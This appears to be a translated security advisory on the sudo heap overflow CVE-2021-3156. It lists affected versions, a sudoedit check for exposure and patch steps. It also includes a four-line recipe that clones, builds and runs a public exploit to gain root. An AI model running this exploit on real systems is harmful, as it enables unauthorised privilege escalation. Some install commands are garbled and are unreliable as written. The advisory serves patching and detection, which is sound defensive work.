Vulnerability description:
On January 27, 2021, RedHat officially announced the risk of sudo buffer/stack overflow vulnerability. Common users can exploit this vulnerability to obtain root permissions without authentication. The vulnerability POC has been published on the Internet to remind Linux system administrators to fix it as soon as possible.
Vulnerability level: Critical
Affected version:
Sudo: 1.8.2-1.8.31 p2
Sudo: 1.9.0-1.9.5 p1
Vulnerability recurrence:
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich 1
Copy the codeKali Linux relive:
Ubuntu – 20.04.1 repetition:
Detection method:
Log in to the system as the non-root user and run the following command:
sudoedit -s /
Copy the code– Responding to an error starting with sudoEdit: indicates a vulnerability.
[admin@Q01 ~]$ sudoedit -s /
sudoedit: /: not a regular file
Copy the code– If you respond with an error beginning with Usage:, the patch has taken effect.
[admin@Q02 ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ...
Copy the codeRepair suggestions:
Sudo yum -y install sudo
Method 2: Download the software package and install Sudo 1.9.5P2 or later
Download the sudo package at www.sudo.ws/dist/
Wget https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz tar - ZXVF sudo - 1.9.5 p2. Tar. Gz CD sudo - 1.9.5 p2 &. / configure make && make installCopy the code